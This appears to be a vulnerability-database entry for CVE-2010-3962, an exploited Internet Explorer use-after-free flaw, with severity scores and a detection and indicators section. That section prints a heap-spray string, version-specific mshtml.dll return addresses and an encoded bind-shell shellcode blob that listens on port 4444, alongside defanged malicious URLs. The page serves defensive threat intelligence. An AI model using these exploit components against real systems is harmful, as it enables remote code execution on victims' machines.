cbcvebase.
CVE-2010-3962
published 2010-11-05

CVE-2010-3962: Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading…

PriorityP186high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-10-27
Exploited in the wild
EPSS
96.89%
99.9th percentile
Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010.

Affected

3 ranges
VendorProductVersion rangeFixed in
microsoftinternet_explorer
microsoftinternet_explorer
microsoftinternet_explorer

Detection & IOCsextracted from sources · hover to see the quote

urlhxxp://www.dxcdfghg.com/2.html
urlhxxp://www.dxcdfghg.com/2.js
port4444
otherFAKEOBJ = unescape("%u0d0d%u0d0d")
othermshtml.dll 6.0.2900.3698 Ret=0x5c7dc9d0
othermshtml.dll 7.0.5730.13 Ret=0x597e85f9
bytes
%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff
  • Exploit combines CVE-2010-0806 and CVE-2010-3962 in a single HTML/JS page; look for heap spray patterns using repeated '%u0d0d%u0d0d' NOP sleds alongside CSS clip attribute manipulation in the same document.
  • Exploit delivery involves obfuscated JavaScript (.js) loaded from the same malicious domain as the HTML page; detect co-loading of obfuscated JS from newly-registered or low-reputation domains alongside CSS token sequences.
  • The exploit targets mshtml.dll via a specially crafted CSS tag with the clip attribute; monitor for iexplore.exe crashes or abnormal child process spawning from iexplore.exe on IE 6/7/8.
  • The vtable corruption causes EIP to land at [vtable+0x30+1]; the exact landing address is mshtml.dll version-dependent. Heap spray targets 0x0d0d0d0d; alert on large allocations of repeated 0x0d0d0d0d patterns in browser process memory.
  • Shellcode opens a bind shell on TCP port 4444; monitor for iexplore.exe listening on or connecting to port 4444.
  • Hosting multiple malicious domains on one IP is common; pivot on the IP of dxcdfghg.com to identify co-hosted malicious infrastructure.
  • ·The Metasploit module only has working return addresses for IE6 and IE7; IE8 targets are commented out as non-functional, meaning the module will not reliably exploit IE8 despite the CVE affecting it.
  • ·The exploit return address is not attacker-controlled and is entirely dependent on the loaded mshtml.dll version; some versions land EIP in non-exploitable regions (kernel space, another module), making exploitation version-sensitive.
  • ·DEP/ASLR bypass is not implemented in the public PoC exploit; ROP-based bypass is also noted as unlikely due to the non-controllable program counter value.
  • ·The public PoC exploit (exploit-db 15421) is described as 'quick and dirty' with no DEP/ASLR bypass; heap spray allocation sizes are hardcoded per mshtml.dll version and must be adjusted for other versions.

CVSS provenance

nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck8.1HIGH
cisa8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.